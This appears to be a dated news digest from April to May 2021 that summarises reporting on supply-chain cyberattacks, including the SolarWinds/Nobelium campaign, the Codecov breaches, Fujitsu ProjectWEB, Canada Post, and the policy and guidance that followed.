The May 25 phishing campaign included several iterations of emails sent from the Constant Contact account of USAID. In one example, the emails appear to originate from USAID. The emails posed as an “alert” from USAID dated May 25, 2021. If the user clicked the link on the email, the URL directs them to the legitimate Constant Contact service and then redirects to a Nobelium “controlled infrastructure.” A “malicious ISO” file was then delivered to the system.

Ref - CRN

 _______________________________________________________________________________________

(May 28, 2021)


Almost 3,000 emails targeted by Nobelium attack

The threat actor behind last year’s major SolarWinds hack has led a new targeted campaign spanning nearly 3,000 emails. According to reports, hackers accessed the Constant Contact account of USAID, the service used for email marketing. From there, Nobelium distributed phishing emails that, when clicked, inserted a malicious file used to distribute a backdoor called NativeZone. 

Ref - ARNNet 

_______________________________________________________________________________________

(May 28, 2021)


The group behind SolarWinds hack now targeting government agencies, NGOs - Microsoft

The group behind the SolarWinds cyberattack is now targeting government agencies, think tanks, consultants, and non-governmental organizations, Microsoft Corp said late on Thursday. While organizations in the United States received the largest share of attacks, targeted victims came from at least 24 countries, Microsoft said.

Ref - Reuters 

_______________________________________________________________________________________

(May 28, 2021)


Russia appears to carry out a hack through the system used by the U.S. Aid Agency

By breaching the systems of a supplier used by the federal government, the hackers sent out emails as recently as this week from more than 3,000 genuine-looking accounts. The email was implanted with code that would give the hackers unlimited access to the computer systems of the recipients, from stealing data to infecting other computers on a network.


 _______________________________________________________________________________________

(May 27, 2021)


Another Nobelium Cyberattack

Microsoft has observed cyberattacks by the threat actor Nobelium targeting government agencies, think tanks, consultants, and non-governmental organizations. This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations. By piggybacking on software updates and now mass email providers, Nobelium increases the chances of collateral damage in espionage operations and undermines trust in the technology ecosystem.

Ref - Microsoft 

_______________________________________________________________________________________

(May 27, 2021)


Attack on Fujitsu’s ProjectWEB SaaS platform may be the next big supply chain attack

While still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as a nation-state attack, not unlike the one that targeted the SolarWinds supply chain. Impacted agencies include the Ministry of Land, Infrastructure, Transport, and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport in Tokyo.

Ref - SC Magazine 

_______________________________________________________________________________________

(May 27, 2021)


Canada Post falls victim to a third-party hack

Canada Post is the latest victim of a supply chain attack that allowed hackers to capture the names and addresses of almost one million senders and receivers of packages over a three-year period. This was the result of a cyberattack on its electronic data interchange (EDI) solution supplier, Commport Communications, which manages the shipping manifest data of large parcel business customers.


_______________________________________________________________________________________

(May 26, 2021)


The EU’s response to SolarWinds

Unofficial reports indicate that a number of EU member states are toying with the idea of introducing sanctions against Russian citizens who were allegedly involved in the SolarWinds campaign. Also, given the steady deterioration of EU-Russia relations in recent months, member states could be tempted to demonstrate their collective determination to push back against Russia and their commitment to the transatlantic alliance.

Ref - CFR 

_______________________________________________________________________________________

(May 26, 2021)


Newly discovered bugs in VSCode extensions could lead to supply chain attacks

Severe security flaws uncovered in popular Visual Studio Code extensions could enable attackers to compromise local machines as well as build and deployment systems through a developer's integrated development environment (IDE). The vulnerable extensions could be exploited to run arbitrary code on a developer's system remotely, in what could ultimately pave the way for supply chain attacks.


 _______________________________________________________________________________________

(May 26, 2021)


How SolarWinds changed cybersecurity leadership's priorities

The recent Scale survey showed that in wake of SolarWinds attacks, security leaders are retooling their security operations in response to the changing threat environment. For instance, 36% said that they expected third-party risks to rise over the next 12 months. Around 47% said third-party risks are a top factor affecting the C-suite's understanding of the business impact of security, behind data breaches at 57% and remote work at 54%.


_______________________________________________________________________________________

(May 26, 2021)


Federal Agencies struggling with supply chain security

More than five months after the SolarWinds supply chain attack came to light, federal agencies continue to struggle with supply chain security, according to a Government Accountability Office official. In the absence of foundational risk management practices, malicious actors may continue to exploit vulnerabilities in the ICT supply chain, causing further disruption to mission operations, harm to individuals, or theft of intellectual property.


_______________________________________________________________________________________

(May 25, 2021)


Supply chain attacks: How to reduce open-source vulnerabilities

Organizations are increasingly turning to adversary simulation engagements to reduce the impact of supply chain attacks. In these tests, a ‘red’ team uses the same tactics, techniques, and procedures that threat actors employ. The ‘blue’ team responds to the attacks from the red team. They’ll gain valuable knowledge by combating the same tools threat actors are currently using.


_______________________________________________________________________________________

(May 25, 2021)


How to avoid web supply chain attacks

The simplest thing that you may expect for secure interaction with your suppliers is that your contractors should present you with a web vulnerability scanner compliance report, such as the OWASP Top-10 report offered by Acunetix. This type of report will immediately show you if the software that you are purchasing has any vulnerabilities and if these are the types of vulnerabilities that you should worry about.


_______________________________________________________________________________________

(May 25, 2021)


Three-quarters of CISOs predict another SolarWinds-style attack

Some 84% of global organizations have suffered a serious security incident over the past two years and a majority are expecting another SolarWinds-style supply chain attack, according to a new Splunk report.


_______________________________________________________________________________________

(May 25, 2021)


Tailor security training to developers to tackle software supply chain risks

A lack of cohesion between software development teams and cybersecurity functions compounds the software supply chain risks faced by organizations, making it all the more urgent for cybersecurity leaders and their teams to better engage with and educate developers. The training must be tailored to address the specific cyber risks surrounding the software development lifecycle.

Ref - CSO Online 

_______________________________________________________________________________________

(May 24, 2021)


Recent cyberattacks signal alarm for better supply chain security

There are three important lessons from the fallout of recent major cyber incidents, including SolarWinds attacks. Any organization leveraging third-party software must not take its convenience and claims of being secure at face value but pay attention to the integrity of the services they use. There must be a focus on container security. Before integrating a third-party service, organizations need to ensure that these vendors’ security standards are up-to-par.

 
_______________________________________________________________________________________

(May 24, 2021)


SolarWinds, Exchange attacks revive calls for mandatory breach notification

On the heels of three major cybersecurity incidents over the past six months—the SolarWinds and Microsoft Exchange supply chain attacks and the Colonial Pipeline ransomware attack—government officials and some in the private sector are reviving calls for better information sharing and national breach notification requirements.

Ref - CSO Online 

_______________________________________________________________________________________

(May 21, 2021)


E-commerce giant Mercari suffers major data breach in Codecov incident

E-commerce platform Mercari has disclosed a major data breach incident that occurred due to exposure from the Codecov supply-chain attack. The company has confirmed that tens of thousands of customer records, including financial information, were exposed to external actors due to the Codecov breach.


_______________________________________________________________________________________

(May 21, 2021)


Department of Veterans Affairs not a victim of SolarWinds hack

The Department of Veterans Affairs (VA) was not a victim of the sweeping SolarWinds hacking campaign, the department’s top cyber official told lawmakers. Paul Cunningham, chief information security officer of VA, said there was no evidence of compromise across its wide-ranging and complex networks. He told lawmakers this finding was reaffirmed in separate investigations by the CISA and the intelligence community.

Ref - Fed Scoop
 
_______________________________________________________________________________________

(May 20, 2021)


12 lessons learned from the SolarWinds breach

CRN spoke with 12 prominent C-suite executives at RSA Conference 2021 about the biggest lessons learned from one of the most infamous cyberattacks of all time. They compiled 12 major takeaways from the SolarWinds breach, from applying far greater scrutiny to technology suppliers and code used during the application development process to eliminating the use of on-premise Microsoft Active Directory.

Ref - CRN 

_______________________________________________________________________________________

(May 20, 2021)


SolarWinds attack dates back to at least January 2019

Hackers were present in SolarWinds' systems as early as January 2019, months earlier than previously reported, SolarWinds President and CEO Sudhakar Ramakrishna revealed during an appearance at the 2021 RSA Conference (RSAC). The entry point was the SolarWinds Orion software. Attackers compromised the SolarWinds system for distributing software updates and used that to spread malware to its customers.

Ref - PCMag 

_______________________________________________________________________________________

(May 19, 2021)


SentinelOne: More supply chain attacks are coming

Large-scale supply chain attacks are here to stay, according to Marco Figueroa, the principal threat researcher at SentinelOne. During an RSA Conference 2021 session, Figueroa dissected Sunburst, the malware used to compromise SolarWinds' Orion platform that led to an extensive supply chain attack on dozens of organizations.

Ref - TechTarget 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO provides new details into attack and response

New details into the notorious SolarWinds nation-state attack and its fallout were provided by Sudhakar Ramakrishna, CEO of SolarWinds, during a keynote session on Day 3 of the virtual RSA Conference 2021. This included the revelation that the attackers may have accessed the system as early as January 2019 and an expression of remorse for comments made during his congressional appearance about the attack in February 2021.


_______________________________________________________________________________________

(May 19, 2021)


monday.com source code has been accessed by Codecov threat actors

monday.com has revealed it had suffered a Codecov supply-chain attack that recently impacted several organizations. During the cyberattack, threat actors accessed a read-only copy of its source code. The cyberattack occurred around January 31 2021 when cybercriminals obtained private access to hundreds of networks belonging to Codecov’s users.


_______________________________________________________________________________________

(May 19, 2021)


How CISA limited the impact of the SolarWinds attack

Soon after the specifics about the SolarWinds attack came to light, the DHS went to work to limit the damage. Among the first things it did was put the attack signatures into the EINSTEIN toolset that is used by nearly every agency. EINSTEIN was extremely useful in terms of identifying suspicious network traffic from a handful of federal civilian agencies that upon further investigation by those agencies helped identify additional victims of this campaign.


_______________________________________________________________________________________

(May 19, 2021)


Pentagon’s CMMC compliance may block a SolarWinds-style attack

The Pentagon’s Cybersecurity Maturity Model Certification (CMMC) program is designed to be one key line of defense. The program sets out five maturity models applicable to defense industrial base contractors based on the level of sensitivity of information stored in their systems. Under the program, obtaining a certification of compliance at the appropriate risk level is an allowable cost. However, the extent to which contractors may have to dig into their own pockets to obtain certification is a running concern.

Ref - FCW 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds CEO apologizes for blaming an intern

Sudhakar Ramakrishna, the former CEO of Pulse Secure who took the top job at SolarWinds, apologized for the way the company blamed an intern for using a weak password - solarwinds123 - during early testimony before congress. When asked about the password, former SolarWinds CEO Kevin Thompson said the password was a mistake that an intern made. Ramakrishna also told lawmakers that the password was from an intern’s Github account.

Ref - The Record 

_______________________________________________________________________________________

(May 19, 2021)


SolarWinds - a harbinger for a national data breach reporting law

As the SolarWinds attack exemplified, the conversation around federal data breach reporting legislation is becoming increasingly relevant. FireEye’s public disclosure of the SolarWinds attack exemplified the benefits of proactive partnerships between the government and private sector, which have been strengthened over the years by routine information sharing and other initiatives.

Ref - Duo 

_______________________________________________________________________________________


(May 18, 2021)


Government eyes new rules to tighten security against supply chain attacks

The Department for Digital, Culture, Media, and Sport (DCMS) has put out a call for views on the new rules, which may require IT service providers and managed services providers (MSPs) to undergo the same cybersecurity assessments that critical national infrastructure providers do.

Ref - ZDNet 

_______________________________________________________________________________________

(May 18, 2021)


Russian denial regarding SolarWinds hack is 'unconvincing'

Russia's denial of involvement in the SolarWinds hack is "unconvincing", the former head of GCHQ's National Cyber Security Centre has said. And Prof Ciaran Martin said there was evidence the tactics, techniques, and tools used by the hackers matched many years of SVR activity.

Ref - BBC 

_______________________________________________________________________________________

(May 18, 2021)


Russian spy chief denies SolarWinds attack

Russia's spy chief denied responsibility for the SolarWinds cyber attack but said he was "flattered" by the accusations from the U.S. and Britain that Russian foreign intelligence was behind such a sophisticated hack. Naryshkin said he did not want to accuse the U.S. of being behind the attack but quoted from documents leaked by former NSA contractor Edward Snowden to suggest that the tactics of the attack were similar to those used by U.S. and British intelligence agencies.

Ref - Reuters 

_______________________________________________________________________________________

(May 17, 2021)


Disconnect Internet for 3-5 days to evict SolarWinds hackers from the network

The newly published analysis report, AR21-134A, details resource-intensive and highly complex steps that will require disconnecting the enterprise network from the internet for three to five days. It is tailored for federal agencies that used affected versions of SolarWinds Orion and which discovered adversary activity within their environments (Category 3 agencies).


_______________________________________________________________________________________

(May 16, 2021)


SolarWinds breach exposes hybrid multi-cloud security weaknesses

Exposing severe security weaknesses in hybrid cloud, authentication, and least privileged access configurations, the high-profile SolarWinds breach laid bare just how vulnerable every business is. Enterprise leaders must see beyond the much-hyped baseline levels of identity and access management (IAM) and privileged access management (PAM) now offered by cloud providers.

Ref - VentureBeat 

_______________________________________________________________________________________

(May 14, 2021)


Supplemental direction (v4) on the implementation of CISA Emergency Directive (ED) 21-01

Agencies that have or had networks that used affected versions of SolarWinds Orion and have evidence of follow-on threat actor activity, such as binary beaconing to avsvmcloud[.]com and secondary C2 activity to a separate domain or IP address, including networks hosted by third parties on behalf of federal agencies, must comply with the applicable requirements for each network meeting respective conditions.

Ref - DHS

_______________________________________________________________________________________

(May 14, 2021)


Guidance for networks affected by the SolarWinds and Active Directory/M365 Compromise

Remediation plans for dealing with malicious compromises are necessarily unique to every organization, and success requires careful consideration. There are three phases for evicting the actor: Pre-Eviction (actions to detect and identify APT activity and prepare the network for eviction); Eviction (actions to remove the APT actor from on-premises and cloud environments); and Post-Eviction (actions to ensure eviction was successful and the network has good cyber posture).

Ref - CISA 

_______________________________________________________________________________________

(May 14, 2021)


Effective tactics to prevent supply chain attacks

Upguard recommends several strategies to have the highest chances of preventing supply chain attacks. This includes implementing Honeytokens, having a secure Privileged Access Management, and implementing a Zero Trust Architecture. In addition, it recommends identifying all potential insider threats, protecting vulnerable resources, and minimizing access to sensitive data.

Ref - Upguard 

_______________________________________________________________________________________

(May 14, 2021)


Rapid7 source code, alert data accessed in Codecov supply chain attack

Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. The cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script.

Ref - ZDNet
 
_______________________________________________________________________________________

(May 13, 2021)


Addressing SolarWinds through executive action

The Executive Order (EO) on cybersecurity is a much-needed step toward shoring up the nation’s cyber posture. On the heels of last week’s damaging ransomware attack on Colonial Pipeline, this EO is a necessary step forward. While the EO will not solve all of the security problems or prevent the next SolarWinds attack – and the truth is no single policy, government initiative, or technology will – it is a great start. 

Ref - Forbes 

_______________________________________________________________________________________

(May 13, 2021)


Third-party software may leave you vulnerable to cyberattacks

Leaders need new ways to reduce supply chain cybersecurity risks, whether they’re buying digital products and or producing them. The data showed that managers often fall prey to counterproductive and possibly dangerous mindsets that get in the way of securing supply chains and leave their companies exposed — and that they’re often taking cues from the top.

Ref - HBR 

_______________________________________________________________________________________

(May 13, 2021)


Some implicitly trusted infrastructure areas can lead to supply chain compromises

Supply chains are vast, and this is by no means a comprehensive list of potential problems. A threat modeling exercise within the organization can give a more robust view of vulnerable infrastructure that is often overlooked. Users should take a concentrated look at the implicit trust relationships that they have with vendors and open-source software used in their build or manufacturing process and they will likely find many areas where trust supersedes security.


_______________________________________________________________________________________

(May 12, 2021)


How Biden’s new executive order plans to prevent another SolarWinds attack

The Biden administration has been drafting the order over the last few months and is designed less to address an incident like the one experienced by Colonial Pipeline, a privately-owned critical infrastructure operator that is believed to have been hit by a criminal gang than it is aimed at preventing a future SolarWinds-like incident.

 
_______________________________________________________________________________________

(May 12, 2021)


Senate hearing raises questions about SolarWinds backdoors

The U.S. Department of Commerce's CISO said during a Senate committee hearing Tuesday that his agency was one of the first to identify a SolarWinds-related compromise, raising questions about when the U.S. government initially detected the supply chain attacks.

 
_______________________________________________________________________________________

(May 12, 2021)


Supply chain penetration: Here’s how to protect from them

Effective protection of the supply chain means the adoption of a different mindset, one that assumes a breach will happen at some point. Because the supply chain represents a critical attack vector, an attack in this area could be a critical one, so cyber measures must be stepped up accordingly. Securing access to sensitive data and systems means organizations can reduce the risks significantly, thereby making it more difficult for attackers to achieve their end goals.


_______________________________________________________________________________________

(May 11, 2021)


Senators discuss federal cybersecurity following SolarWinds hack

Government officials say the 2020 SolarWinds cyber hack by the Russian government should have been a wake-up call. The U.S. is instead dealing with another cyber attack, this time on the largest fuel pipeline in the country. The SolarWinds and Pulse Secure VPN attacks targeted federal agencies and yet it was private sector companies that discovered them.

Ref - News10 

_______________________________________________________________________________________

(May 11, 2021)


Key challenges with modern AppSec and supply chain attacks

The OWASP API project has enumerated 10 critical API level threats that are substantially more important in the era of modern, cloud-native applications. The three key trends – microservice proliferation, application change, and porous perimeters – create an environment where attacks can flourish and where IT and security teams need to consider revisiting their application security practices and controls.

Ref - DevOps 

_______________________________________________________________________________________

(May 11, 2021)


SolarWinds CEO calls for collective action against state attacks

SolarWinds CEO Sudhakar Ramakrishna has revealed he is talking with his peers in the industry to form a consortium of like-minded, mid-market firms that could take collective action to defend themselves against nation state-backed malicious actors, such as Russia’s APT29, or Cozy Bear. Ramakrishna called for the industry to adopt a model of mutual responsibility and mutual accountability among smaller firms, noting that size alone is not an indicator of a company’s ability to protect itself from cyber attacks.


_______________________________________________________________________________________

(May 10, 2021)


Twilio, HashiCorp among Codecov supply chain hack victims

The stealth software supply chain compromise of the Codecov Bash Uploader went undetected since January. The first company to publicly acknowledge exposure was HashiCorp when a post-breach investigation found a subset of its CI pipelines used the affected Codecov component. Following HashiCorp’s statement, San Francisco-based Twilio issued an advisory to confirm it used the compromised Bash Uploader component in a small number of projects and CI pipelines.


_______________________________________________________________________________________

(May 10, 2021)


All you need to know about supply chain attacks and cloud-native

There are several characteristics of cloud-native application development environments that make them a lucrative target for attackers looking to embed malicious code into the supply chain. Cloud-native application development is characterized by the widespread use of open source components, often obtained from public registries. Additionally, container images, functions, and packages are updated frequently using CI/CD pipelines, creating multiple opportunities for attackers to embed themselves into the process.

Ref - TheNewStack 

_______________________________________________________________________________________

(May 10, 2021)


Cisco Threat Explainer: Supply Chain Attacks

There is a general pattern in supply chain attacks. First, the bad actors gather what information they can find about the primary target. Next, the bad actors attempt to compromise the secondary target. Once in, the attackers move laterally, their objective often being to compromise the secondary target’s software build system, where the source code for their software is stored, updated, and compiled.

Ref - Cisco 

_______________________________________________________________________________________

(May 10, 2021)


NIST and CISA release guidelines for defense against software supply chain attacks

The CISA and the NIST have released new guidelines on defending against various software supply chain risks. The agencies listed update hijacking, tampering with code signing, and the compromise of open-source code as the popular methods used by hackers to compromise software. Threat actors hijack update channels, like in the Russian NotPetya attack on Ukraine via tax accounting software. The SolarWinds Orion software supply chain attack employed similar tactics.

Ref - CPO Magazine 

_______________________________________________________________________________________

(May 10, 2021)


Ransomware attack on CaptureRx exposes multiple providers across the U.S.

Multiple healthcare providers across the United States are reporting being impacted by a ransomware attack on CaptureRx, a San Antonio-based company providing drug-related administrative services. The CaptureRx attack highlights the impact of the software supply chain, and Faxton St. Luke’s Healthcare in New York, Randolph, VT-based Gifford Health Care, and Thrifty Drug Stores are just a few of the victims.

Ref - ZDNet 

_______________________________________________________________________________________

(May 10, 2021)


The Colonial Pipeline ransomware attack and the SolarWinds hack were all but inevitable

Software supply chains and private sector infrastructure companies are vulnerable to hackers. Many U.S. companies outsource software development because of a talent shortage, and some of that outsourcing goes to companies in Eastern Europe that are vulnerable to Russian operatives.

Ref - Yahoo 

_______________________________________________________________________________________

(May 10, 2021)


SolarWinds shares more information on cyberattack impact, initial access vector

Texas-based IT management company SolarWinds shared more information on the impact of the significant breach disclosed late last year, and claimed that less than 100 of its customers were actually hacked. The company said the attacker only targeted its build system for the Orion product, but did not actually modify any source code repository, and the SUNBURST malware has not been found in any other product.


_______________________________________________________________________________________

(May 8, 2021)


Best practices to reduce supply chain cyber exposure

Cyber-attacks against the supply chain continue to grow — and some are simply impossible to eliminate. With that in mind, consider an approach rooted in cyber risk management. Whereas a traditional cybersecurity approach focuses primarily on mitigation, cyber risk management understands that not all risks can be removed and not all attacks can be prevented, especially when it comes to the supply chain.

Ref - Marsh
 
_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian Group likely took data during the cyberattack

While SolarWinds doesn’t know how the Russia-backed group broke into its networks, the company believes the hackers may have used an unknown vulnerability, a brute-force cyber attack, or through social engineering -- such as a phishing operation. The hackers then conducted “research and surveillance” on the company, including its Microsoft Office 365 environment, for at least nine months prior to October 2019, when they moved to the “test run” phase of the attack.

Ref - Bloomberg 

_______________________________________________________________________________________

(May 8, 2021)


SolarWinds says Russian group likely took data during cyber-attack

The Russia-linked hackers that compromised popular software by the Texas-based firm SolarWinds last year broke into email accounts and likely took data from the firm. SolarWinds said it found evidence that causes us to believe the threat actor exfiltrated certain information as part of its research and surveillance.


_______________________________________________________________________________________

(May 7, 2021)


Hackers accessed SolarWinds’ Office 365 since early 2019

Hackers persistently accessed SolarWinds’ internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their vicious cyberattack. Hackers compromised SolarWinds’ credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.
Ref - CRN 

_______________________________________________________________________________________

(May 7, 2021)


US-UK Government warns about SolarWinds attackers adding a new tool to its arsenal

Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.

Ref - SecurityWeek 

_______________________________________________________________________________________

(May 7, 2021)


An investigative update of the cyberattack

SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.

Ref - SolarWinds 

_______________________________________________________________________________________

(May 7, 2021)


FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity

Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing TTPss of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. Agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.


_______________________________________________________________________________________

(May 7, 2021)


Ransomware, supply chain attacks show no sign of abating

Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.


_______________________________________________________________________________________

(May 7, 2021)


Further TTPs associated with SVR cyber actors

Organizations are advised to follow the mitigation advice and guidance below, as well as the detection rules in the appendix to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.


_______________________________________________________________________________________

(May 6, 2021)


Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia

U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.

Ref - CyberScoop 

_______________________________________________________________________________________

(May 5, 2021)


Twilio discloses breach caused by Codecov supply chain hack

Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.

Ref - TechTarget 

_______________________________________________________________________________________

(May 3, 2021)


New Hampshire pushes pause on creating supply chain authority

To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.

Ref - GovTech

_______________________________________________________________________________________

(May 3, 2021)


Stopping the next SolarWinds requires doing something different

The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.

Ref - DarkReading 

_______________________________________________________________________________________

(May 3, 2021)


Key indicators that the supply chain vendor has been breached

If a vendor does not provide clear and substantial responses to risk assessments, they could be concealing gaping holes in their information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If system tracking can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.

Ref - Upguard 

_______________________________________________________________________________________

(May 1, 2021)


More US agencies potentially hacked, this time with Pulse Secure exploits

At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.
Ref - ARS Technica 

______________________________________________________________________________________

(April 30, 2021)


Key questions to consider to help mitigate against supply chain attacks

With the recent SolarWinds SunBurst exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.


_______________________________________________________________________________________

(April 30, 2021)


A tale of two hacks: from SolarWinds to Microsoft Exchange

The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.

Ref - ThreatPost 

_______________________________________________________________________________________

(April 29, 2021)


Finding the weakest link in the supply chain

An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.

Ref - Forbes 

_______________________________________________________________________________________

(April 29, 2021)


A new PHP composer bug could enable widespread supply-chain attacks

The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.


_______________________________________________________________________________________

(April 29, 2021)


Biden preparing cybersecurity executive order in response to SolarWinds attack

President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.

Ref - The Hill 

_______________________________________________________________________________________

(April 28, 2021)


Minimizing the risk of supply chain attacks – best practice guidelines

Sophos provides several recommendations to minimize the risk of supply chain attacks. It recommends switching from a reactive to a proactive approach to cybersecurity, monitor for early signs of compromise, audit the supply chain, assess the security posture of all suppliers and business partners, and have a constant review of IT security operation hygiene.

Ref - Sophos 

_______________________________________________________________________________________

(April 28, 2021)


Lawmakers want to create a reserve corps to respond to the next SolarWinds

A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.


_______________________________________________________________________________________

(April 28, 2021)


CISA issues guidance on defending against software supply chain attacks

The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).


 _______________________________________________________________________________________

(April 28, 2021)


5 ways to protect software supply-chains from malicious attackers

Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted in repositories; having a plan made for external services; and creating an on-premises and cloud strategy.

Ref - Radware

_______________________________________________________________________________________

(April 27, 2021)


Another SolarWinds lesson: hackers are targeting Microsoft authentication servers

During SolarWinds, hackers directly targeted the AD FS servers to obtain certifications. Mandiant’s new attack does not require direct access to the AD FS server. Rather, hackers would spoof one AD FS server communicating with another to obtain its keys. This is not trivial, as it still requires credentials from an extremely privileged account to pull off. But given the capacity of the hackers involved in SolarWinds, chief information security officers should begin to see these kinds of attacks as part of the threat landscape.

Ref - SC Magazine 

_______________________________________________________________________________________

(April 27, 2021)


Software supply chain may get you by exploiting Open-Source libraries

Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.


_______________________________________________________________________________________

(April 27, 2021)


Defending against software supply chain attacks

The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.

Ref - CISA 

_______________________________________________________________________________________

(April 27, 2021)


DFS report identifies key cybersecurity measures to reduce supply chain risk

The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of the New York’s financial services industry’s response to the supply chain attack of the IT company SolarWinds. During the SolarWinds Attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems. 


_______________________________________________________________________________________

(April 26, 2021)


SolarWinds, Microsoft hacks prompt focus on Zero-Trust security

Analysis of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., from the CISA, the NSA, and the FBI found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.


_______________________________________________________________________________________

(April 26, 2021)


CISA and NIST release new interagency resource to defend against supply chain attacks

To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.

Ref - CERT-CISA 

_______________________________________________________________________________________

(April 26, 2021)


Another top VPN is reportedly being used to spread SolarWinds hack

Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.

Ref - TechRadar 

_______________________________________________________________________________________

(April 25, 2021)


Stopping SolarWinds’ style mega hacks, but preserving democracy

The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.


_______________________________________________________________________________________

(April 24, 2021)


HashiCorp is the latest victim of the Codecov supply-chain attack

Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.


_______________________________________________________________________________________

(April 23, 2021)


